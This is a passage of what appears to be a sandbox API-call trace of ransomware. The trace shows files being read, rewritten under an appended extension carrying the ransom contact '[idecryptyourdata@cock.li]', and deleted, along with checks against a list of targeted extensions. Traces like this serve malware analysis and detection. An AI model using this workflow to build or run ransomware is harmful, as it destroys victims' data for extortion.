lpBuffer=0x38b3020, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0) Thread: id = 11 os_tid = 0xd24 [0045.420] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x67e280 [0045.421] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10000) returned 0x68e288 [0045.421] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cf38 [0045.421] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x6) returned 0x65d070 [0045.421] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cd88 [0045.421] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x39c1020 [0045.424] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62ce48 [0045.424] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62ce48, Size=0x20) returned 0x60e9d0 [0045.424] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x62cef0 [0045.424] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62cef0, Size=0x20) returned 0x60ea20 [0045.424] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0045.424] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0045.424] Wow64DisableWow64FsRedirection (in: OldValue=0x2bcff50 | out: OldValue=0x2bcff50*=0x0) returned 1 [0045.424] lstrlenW (lpString="kernel32.dll") returned 12 [0045.424] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9d0 | out: hHeap=0x5d0000) returned 1 [0045.424] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0045.424] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea20 | out: hHeap=0x5d0000) returned 1 [0045.424] Sleep (dwMilliseconds=0x64) [0045.635] lstrcmpiW (lpString1=".log", lpString2=".bat") returned 1 [0045.635] lstrlenW (lpString="oobe_2017_09_07_03_08_57_737.log") returned 32 [0045.635] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.807] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=6004) returned 1 [0046.807] CloseHandle (hObject=0x2e0) returned 1 [0046.807] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 0x20 [0046.807] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.808] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.808] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.808] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.808] CreateFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.808] GetLastError () returned 0x0 [0046.808] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x1774, lpOverlapped=0x0) returned 1 [0046.820] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x1780, lpOverlapped=0x0) returned 1 [0046.821] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.821] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x114, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x114, lpOverlapped=0x0) returned 1 [0046.821] SetEndOfFile (hFile=0x2c0) returned 1 [0046.821] CloseHandle (hObject=0x2c0) returned 1 [0046.824] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.824] SetEndOfFile (hFile=0x2e0) returned 1 [0046.825] CloseHandle (hObject=0x2e0) returned 1 [0046.825] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0046.825] DeleteFileW (lpFileName="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log" (normalized: "c:\\$getcurrent\\logs\\oobe_2017_09_07_03_08_57_737.log")) returned 1 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString=".doc") returned 4 [0046.826] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.826] lstrlenW (lpString=".docx") returned 5 [0046.826] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0046.826] lstrlenW (lpString=".pdf") returned 4 [0046.826] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.826] lstrlenW (lpString=".xls") returned 4 [0046.826] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.826] lstrlenW (lpString=".xlsx") returned 5 [0046.826] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0046.826] lstrlenW (lpString=".ppt") returned 4 [0046.826] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString=".zip") returned 4 [0046.826] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.826] lstrlenW (lpString=".rar") returned 4 [0046.826] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.826] lstrlenW (lpString=".bz2") returned 4 [0046.826] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.826] lstrlenW (lpString=".7z") returned 3 [0046.826] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString=".dbf") returned 4 [0046.826] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString=".1cd") returned 4 [0046.826] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.826] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.826] lstrlenW (lpString=".jpg") returned 4 [0046.826] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString=".doc") returned 4 [0046.827] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0046.827] lstrlenW (lpString=".docx") returned 5 [0046.827] lstrcmpiW (lpString1=".docx", lpString2="7.log") returned -1 [0046.827] lstrlenW (lpString=".pdf") returned 4 [0046.827] lstrcmpiW (lpString1=".pdf", lpString2=".log") returned 1 [0046.827] lstrlenW (lpString=".xls") returned 4 [0046.827] lstrcmpiW (lpString1=".xls", lpString2=".log") returned 1 [0046.827] lstrlenW (lpString=".xlsx") returned 5 [0046.827] lstrcmpiW (lpString1=".xlsx", lpString2="7.log") returned -1 [0046.827] lstrlenW (lpString=".ppt") returned 4 [0046.827] lstrcmpiW (lpString1=".ppt", lpString2=".log") returned 1 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString=".zip") returned 4 [0046.827] lstrcmpiW (lpString1=".zip", lpString2=".log") returned 1 [0046.827] lstrlenW (lpString=".rar") returned 4 [0046.827] lstrcmpiW (lpString1=".rar", lpString2=".log") returned 1 [0046.827] lstrlenW (lpString=".bz2") returned 4 [0046.827] lstrcmpiW (lpString1=".bz2", lpString2=".log") returned -1 [0046.827] lstrlenW (lpString=".7z") returned 3 [0046.827] lstrcmpiW (lpString1=".7z", lpString2="log") returned -1 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString=".dbf") returned 4 [0046.827] lstrcmpiW (lpString1=".dbf", lpString2=".log") returned -1 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString=".1cd") returned 4 [0046.827] lstrcmpiW (lpString1=".1cd", lpString2=".log") returned -1 [0046.827] lstrlenW (lpString="C:\\$GetCurrent\\Logs\\oobe_2017_09_07_03_08_57_737.log") returned 52 [0046.827] lstrlenW (lpString=".jpg") returned 4 [0046.827] lstrcmpiW (lpString1=".jpg", lpString2=".log") returned -1 [0046.827] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.828] lstrlenW (lpString="eula.rtf") returned 8 [0046.828] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.828] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=8876) returned 1 [0046.828] CloseHandle (hObject=0x2e0) returned 1 [0046.828] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 0x80 [0046.828] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.828] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0046.829] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.829] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.829] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0046.829] GetLastError () returned 0x0 [0046.829] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x22ac, lpOverlapped=0x0) returned 1 [0046.899] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0x22b0, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0x22b0, lpOverlapped=0x0) returned 1 [0046.900] ReadFile (in: hFile=0x2e0, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.900] WriteFile (in: hFile=0x2c0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.900] SetEndOfFile (hFile=0x2c0) returned 1 [0046.901] CloseHandle (hObject=0x2c0) returned 1 [0046.901] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.902] SetEndOfFile (hFile=0x2e0) returned 1 [0046.903] CloseHandle (hObject=0x2e0) returned 1 [0046.903] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.903] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1032\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1032\\eula.rtf")) returned 1 [0046.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.903] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.903] lstrlenW (lpString=".doc") returned 4 [0046.903] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.903] lstrlenW (lpString=".docx") returned 5 [0046.903] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.903] lstrlenW (lpString=".pdf") returned 4 [0046.903] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.903] lstrlenW (lpString=".xls") returned 4 [0046.904] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.904] lstrlenW (lpString=".xlsx") returned 5 [0046.904] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.904] lstrlenW (lpString=".ppt") returned 4 [0046.904] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString=".zip") returned 4 [0046.904] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.904] lstrlenW (lpString=".rar") returned 4 [0046.904] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString=".bz2") returned 4 [0046.904] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString=".7z") returned 3 [0046.904] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString=".dbf") returned 4 [0046.904] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString=".1cd") returned 4 [0046.904] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString=".jpg") returned 4 [0046.904] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.904] lstrlenW (lpString=".doc") returned 4 [0046.904] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.904] lstrlenW (lpString=".docx") returned 5 [0046.905] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.905] lstrlenW (lpString=".pdf") returned 4 [0046.905] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString=".xls") returned 4 [0046.905] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.905] lstrlenW (lpString=".xlsx") returned 5 [0046.905] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.905] lstrlenW (lpString=".ppt") returned 4 [0046.905] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.905] lstrlenW (lpString=".zip") returned 4 [0046.905] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.905] lstrlenW (lpString=".rar") returned 4 [0046.905] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString=".bz2") returned 4 [0046.905] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString=".7z") returned 3 [0046.905] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.905] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.905] lstrlenW (lpString=".dbf") returned 4 [0046.905] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.905] lstrlenW (lpString=".1cd") returned 4 [0046.905] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.905] lstrlenW (lpString="C:\\588bce7c90097ed212\\1032\\eula.rtf") returned 35 [0046.905] lstrlenW (lpString=".jpg") returned 4 [0046.905] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.906] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.906] lstrlenW (lpString="eula.rtf") returned 8 [0046.906] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.914] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x2bcff14 | out: lpFileSize=0x2bcff14*=3188) returned 1 [0046.914] CloseHandle (hObject=0x2d8) returned 1 [0046.914] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 0x80 [0046.915] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.915] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0046.915] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.915] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.915] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d0 [0046.915] GetLastError () returned 0x0 [0046.915] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0xc74, lpOverlapped=0x0) returned 1 [0046.929] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xc80, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xc80, lpOverlapped=0x0) returned 1 [0046.931] ReadFile (in: hFile=0x2d8, lpBuffer=0x39c1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2bcfecc, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesRead=0x2bcfecc*=0x0, lpOverlapped=0x0) returned 1 [0046.931] WriteFile (in: hFile=0x2d0, lpBuffer=0x39c1020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2bcfc94, lpOverlapped=0x0 | out: lpBuffer=0x39c1020*, lpNumberOfBytesWritten=0x2bcfc94*=0xe4, lpOverlapped=0x0) returned 1 [0046.931] SetEndOfFile (hFile=0x2d0) returned 1 [0046.931] CloseHandle (hObject=0x2d0) returned 1 [0046.932] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2bcfec0 | out: lpNewFilePointer=0x0) returned 1 [0046.932] SetEndOfFile (hFile=0x2d8) returned 1 [0046.933] CloseHandle (hObject=0x2d8) returned 1 [0046.933] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.934] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1033\\eula.rtf")) returned 1 [0046.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.934] lstrlenW (lpString=".doc") returned 4 [0046.934] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.934] lstrlenW (lpString=".docx") returned 5 [0046.934] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.934] lstrlenW (lpString=".pdf") returned 4 [0046.934] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.934] lstrlenW (lpString=".xls") returned 4 [0046.934] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.934] lstrlenW (lpString=".xlsx") returned 5 [0046.934] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.934] lstrlenW (lpString=".ppt") returned 4 [0046.934] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.934] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.934] lstrlenW (lpString=".zip") returned 4 [0046.934] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.934] lstrlenW (lpString=".rar") returned 4 [0046.934] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.934] lstrlenW (lpString=".bz2") returned 4 [0046.935] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString=".7z") returned 3 [0046.935] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString=".dbf") returned 4 [0046.935] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString=".1cd") returned 4 [0046.935] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString=".jpg") returned 4 [0046.935] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString=".doc") returned 4 [0046.935] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString=".docx") returned 5 [0046.935] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0046.935] lstrlenW (lpString=".pdf") returned 4 [0046.935] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString=".xls") returned 4 [0046.935] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0046.935] lstrlenW (lpString=".xlsx") returned 5 [0046.935] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0046.935] lstrlenW (lpString=".ppt") returned 4 [0046.935] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0046.935] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.935] lstrlenW (lpString=".zip") returned 4 [0046.935] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0046.936] lstrlenW (lpString=".rar") returned 4 [0046.936] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0046.936] lstrlenW (lpString=".bz2") returned 4 [0046.936] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0046.936] lstrlenW (lpString=".7z") returned 3 [0046.936] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0046.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.936] lstrlenW (lpString=".dbf") returned 4 [0046.936] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0046.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.936] lstrlenW (lpString=".1cd") returned 4 [0046.936] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0046.936] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\eula.rtf") returned 35 [0046.936] lstrlenW (lpString=".jpg") returned 4 [0046.936] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0046.936] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0046.936] lstrlenW (lpString="eula.rtf") returned 8 [0046.936] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, 